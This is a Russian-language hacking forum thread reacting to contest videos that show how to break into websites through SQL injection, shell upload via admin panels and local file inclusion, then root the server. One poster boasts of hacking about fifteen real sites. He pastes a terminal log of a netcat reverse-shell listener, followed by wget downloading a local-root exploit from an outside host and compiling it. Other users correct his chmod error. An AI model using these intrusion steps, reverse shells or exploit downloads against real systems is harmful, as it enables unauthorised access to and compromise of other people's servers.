Очень сложный взлом, без пхп знаний не сломаешь, пока самый лучшее видео из 3 просмотренных: 1. Dark Green (самое лучшее) 2. NigthMare (средненькое, но понравились комментарии) 3. Konqi (легкий взлом, достаточно найти скулю и через админку залить шелл) Все видео понравились, способом Конки попробывал и хочу заметить что его способ может повторить даже новичек, в отличии от способов взлома других участников Всем Мир ZiGZaG
Найт ты в следущий раз, вообще ничо не снимай, ток каментируй.. И все будут писать, что им всё понравилось....
точняк По просьбе пользователей - обновил первый пост, заменил линк на архив с сорцами, сам скачал, теперь все точно гуд(хотя и раньше у меня норм качалось/открывалось), качайте, смотрите, учите, развивайтесь
Уже нахекал штук 15 сайтов. Везде одно и тоже блин =\ Code: root@vz7075:~# nc -w 30 -l -p 4444 sh: no job control in this shell sh-3.1$ cd /tmp/ sh-3.1$ sh-3.1$ sh-3.1$ wget http://****.narod.ru/sendpage.c --16:16:03-- http://****.narod.ru/sendpage.c => `sendpage.c' Resolving ****.narod.ru... 213.***.199.46 Connecting to ****.narod.ru|213.***.199.46|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 5,992 (5.9K) [application/octet-stream] 0K ..... 100% 52.51 KB/s 16:16:03 (52.51 KB/s) - `sendpage.c' saved [5992/5992] sh-3.1$ gcc sendpage.c -Wall -o sendpage sh-3.1$ chmod -x sendpage sh-3.1$ ./sendpage sh: ./sendpage: Permission denied
лоле Code: sh-3.1$ chmod -x sendpage вот зачем это? на крайняк chmod +x sendpage Мб харе тупо повторять увиденное где-то, а попробовать думать самому? =\
Прикольный видос =) Лучший из всех тут по-моему. Имхо правильная идея - показать все от поиска уязвимости и до рута =) 2DCrypt командой "chmod -x sendpage" ты убираешь права на выполнение, а надо наоборот "chmod +x sendpage" Кстати в большинстве случаев после компилирования права автоматически выставляются на выполнение =)
Пооолнейшая туфта. И что ты получил доступ к каким то левым сайтам. Вот раньше были взломы известных крупных серверов. А сейчас такое фигня c локальным инклудом школоту только восхищает. Локальный инклюд этоже старо как мир. Руууууууууусь встань с колен!!!
Ну так покажи мастерство Моя задача была, показать полный путь, от поиска уязвимости, до ее применения и рутания сервера, на что ты и подавно не способен. Так что, считаю, твой коммент неуместен. =\ Велком во второй конкурс, там и покажешь свой уровень. Поднять страну с колен может только лидер и образованный человек, дерзай ...
Да тьма таких видео..что с хакера..что тут..хотя отсюда в хакер обычно шлют..боян вообщем Вот демонстрация раскрутки например нестандартными методами уязвимости..новых ветвей..обход каких то замороченных фильтров IDS..и т.д..это показалаось бы интересным.